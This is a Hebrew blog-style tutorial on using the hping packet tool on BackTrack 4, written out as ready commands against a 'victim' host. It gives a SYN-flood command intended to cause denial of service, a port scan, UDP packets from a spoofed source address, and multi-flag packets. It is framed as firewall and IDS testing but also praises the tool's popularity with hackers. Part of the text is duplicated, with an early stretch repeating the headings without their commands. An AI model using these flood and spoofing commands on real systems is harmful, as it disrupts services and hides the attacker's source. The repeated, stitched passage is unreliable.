פלטפורה שמזכירה מאוד את Scapy , רק שפה לא מדובר בכתיבת קוד ב Python אלא בתוכנה של ממש המקבלת Arguments , התכונה העיקרית כמו אצל Scapy והיא יצור של חבילות מידע "מלוכלכות" על מנת לבדוק מערכות: FireWall, IPS,IDS ועוד.
מגוון האפשריות בה מצומצם אך עדיין יעיל מאוד, מאפשרת שימוש בפרוטוקולים: TCP,ICMP,IP,UDP ועבודה עם קבצים ,צורת העבודה ידידותית מאשר מ Scapy מה שהופך אותה לכלי פופולרי מאוד בקרב האקרים.
המאמר נכתב על BackTrack 4.
תחילה נפתח חלון Console ונרשום:
סריקת פורטים של הקורבן בין פורט 100 ל 110
Spoof
שליחת חבילות מידע מכתובת מזויפת.
2Flags Packet
שליחה חבילה עם דגל נוסף
סרטון הדגמה:
מגוון האפשריות בה מצומצם אך עדיין יעיל מאוד, מאפשרת שימוש בפרוטוקולים: TCP,ICMP,IP,UDP ועבודה עם קבצים ,צורת העבודה ידידותית מאשר מ Scapy מה שהופך אותה לכלי פופולרי מאוד בקרב האקרים.
המאמר נכתב על BackTrack 4.
תחילה נפתח חלון Console ונרשום:
#: haping -help
נראה את כל הפרמטרים להעמסה בתוכנה.
Syn-Flood Attack
#: hping -i u1 -S -p 80 192.168.1.105
שליחה מאוד מהירה של חבילות מידע עם דגל Syn , שבפועל יוצר עומס על הקורבן עד שמבאים ל Denial Of Service, בעקבות עומס על המעבד, אחרי שהבנו מה שלחנו נפרק את המשפט לחלקים:
-i u1 - Interval
מספר חבילות פרק זמן למשל u10000 זה 10 חבילות בשניה.
-S - Syn Flag
פרמטר זה קובע שהחבילה שלנו היא Syn אבל ניתן לבחור חבילות נוספות Syn,Rst,Fin,Push,Ack,Urg,Xmas.
-p - Dest Port
הפורט של הקורבן.
Port Scan
#: hping 192.168.1.105 -V --scan 100-110
סריקת פורטים של הקורבן בין פורט 100 ל 110
Spoof
#: hping 192.168.1.105 --udp --spoof 192.168.1.150
שליחת חבילות מידע מכתובת מזויפת.
2Flags Packet
#: hping 192.168.1.105 -S -A -V -p 443
שליחה חבילה עם דגל נוסף
סרטון הדגמה:
בהצלחה...
אין תגובות:
הוסף רשומת תגובה